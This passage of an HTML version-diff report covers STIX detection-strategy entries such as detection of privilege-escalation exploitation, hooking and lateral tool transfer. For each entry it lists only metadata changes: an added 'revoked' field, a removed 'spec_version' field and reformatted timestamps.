style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.685000+00:00</td></tr></tbody></table></details><hr><h4>[DET0738] Detection of Exploitation for Privilege Escalation</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.668000+00:00</td></tr></tbody></table></details><hr><h4>[DET0767] Detection of Exploitation of Remote Services</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.679000+00:00</td></tr></tbody></table></details><hr><h4>[DET0803] Detection of External Remote Services</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.696000+00:00</td></tr></tbody></table></details><hr><h4>[DET0904] Detection of Firmware Modification</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-22T15:56:01.514Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-22 15:56:01.514000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24T20:30:02.969Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.390000+00:00</td></tr></tbody></table></details><hr><h4>[DET0772] Detection of Graphical User Interface</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.683000+00:00</td></tr></tbody></table></details><hr><h4>[DET0798] Detection of Hardcoded Credentials</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.695000+00:00</td></tr></tbody></table></details><hr><h4>[DET0722] Detection of Hooking</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.686000+00:00</td></tr></tbody></table></details><hr><h4>[DET0774] Detection of I/O Image</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.692000+00:00</td></tr></tbody></table></details><hr><h4>[DET0750] Detection of Indicator Removal on Host</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.696000+00:00</td></tr></tbody></table></details><hr><h4>[DET0905] Detection of Insecure Credentials</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-22T16:29:50.802Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-22 16:29:50.802000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24T20:30:16.130Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.391000+00:00</td></tr></tbody></table></details><hr><h4>[DET0796] Detection of Internet Accessible Device</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.692000+00:00</td></tr></tbody></table></details><hr><h4>[DET0745] Detection of Lateral Tool Transfer</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.679000+00:00</td></tr></tbody></table></details><hr><h4>[DET0729] Detection of Loss of Availability</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.694000+00:00</td></tr></tbody></table></details><hr><h4>[DET0778] Detection of Loss of Control</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.674000+00:00</td></tr></tbody></table></details><hr><h4>[DET0757] Detection of Loss of Productivity and Revenue</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.692000+00:00</td></tr></tbody></table></details><hr><h4>[DET0775] Detection of Loss of Protection</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid 